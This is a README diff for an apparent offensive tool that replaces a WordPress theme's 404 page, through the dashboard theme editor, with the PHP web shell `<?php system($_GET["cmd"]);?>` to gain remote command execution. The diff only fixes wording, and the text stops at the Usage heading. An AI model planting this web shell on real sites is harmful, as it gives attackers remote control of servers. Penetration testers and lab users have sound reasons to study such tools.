VouillamozHugo/WP-editor-shell/README.md

 Python script to automaticly get a reverse shell from WP theme editor page

 ## Description
-This script was created to simplify the creation of a reverse shell from a wordpress dashboard editor page.
-It allow the user to update the page 404 of a theme and replace the content with `<?php system($_GET["cmd"]);?>` which then allow command execution on the page.
+This script was created to simplify the creation of a reverse shell from a Wordpress dashboard editor page.
+It allows the user to update the page 404 of a theme and replace the content with `<?php system($_GET["cmd"]);?>` which then allow command execution on the page.

 ## Usage
 Usage to upload the PHP payload and gain RCE on the site